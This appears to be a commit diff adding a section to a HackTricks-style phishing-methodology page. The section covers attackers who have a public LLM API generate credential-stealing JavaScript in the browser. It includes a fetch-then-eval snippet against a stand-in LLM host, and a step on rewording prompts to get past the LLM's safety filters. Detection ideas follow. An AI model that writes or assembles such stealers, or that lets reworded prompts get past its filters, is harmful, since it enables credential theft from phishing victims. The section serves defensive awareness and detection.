Add content from: The Next Frontier of Runtime Assembly Attacks: Leveraging LL...

HackTricks News Bot · HackTricks News Bot · commit 3c3e5be49962 · 2026-01-22T12:48:41.000Z
diff --git a/src/generic-methodologies-and-resources/phishing-methodology/README.md b/src/generic-methodologies-and-resources/phishing-methodology/README.md
@@ -554,6 +554,32 @@ See also – AI agent abuse of local CLI tools and MCP (for secrets inventory an
 ai-agent-abuse-local-ai-cli-tools-and-mcp.md
 {{#endref}}
 
+## LLM-assisted runtime assembly of phishing JavaScript (in-browser codegen)
+
+Attackers can ship benign-looking HTML and **generate the stealer at runtime** by asking a **trusted LLM API** for JavaScript, then executing it in-browser (e.g., `eval` or dynamic `<script>`).
+
+1. **Prompt-as-obfuscation:** encode exfil URLs/Base64 strings in the prompt; iterate wording to bypass safety filters and reduce hallucinations.
+2. **Client-side API call:** on load, JS calls a public LLM (Gemini/DeepSeek/etc.) or a CDN proxy; only the prompt/API call is present in static HTML.
+3. **Assemble & exec:** concatenate the response and execute it (polymorphic per visit):
+
+```javascript
+fetch("https://llm.example/v1/chat",{method:"POST",body:JSON.stringify({messages:[{role:"user",content:promptText}]}),headers:{"Content-Type":"application/json",Authorization:`Bearer ${apiKey}`}})
+  .then(r=>r.json())
+  .then(j=>{const payload=j.choices?.[0]?.message?.content; eval(payload);});
+```
+
+4. **Phish/exfil:** generated code personalises the lure (e.g., LogoKit token parsing) and posts creds to the prompt-hidden endpoint.
+
+**Evasion traits**
+- Traffic hits well-known LLM domains or reputable CDN proxies; sometimes via WebSockets to a backend.
+- No static payload; malicious JS exists only after render.
+- Non-deterministic generations produce **unique** stealers per session.
+
+**Detection ideas**
+- Run sandboxes with JS enabled; flag **runtime `eval`/dynamic script creation sourced from LLM responses**.
+- Hunt for front-end POSTs to LLM APIs immediately followed by `eval`/`Function` on returned text.
+- Alert on unsanctioned LLM domains in client traffic plus subsequent credential POSTs.
+
 ---
 
 ## MFA Fatigue / Push Bombing Variant – Forced Reset
@@ -624,6 +650,7 @@ Defence tips:
 - [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)
 - [2025 Unit 42 Global Incident Response Report – Social Engineering Edition](https://unit42.paloaltonetworks.com/2025-unit-42-global-incident-response-report-social-engineering-edition/)
 - [Silent Smishing – mobile-gated phishing infra and heuristics (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/)
+- [The Next Frontier of Runtime Assembly Attacks: Leveraging LLMs to Generate Phishing JavaScript in Real Time](https://unit42.paloaltonetworks.com/real-time-malicious-javascript-through-llms/)
 
 {{#include ../../banners/hacktricks-training.md}}
 
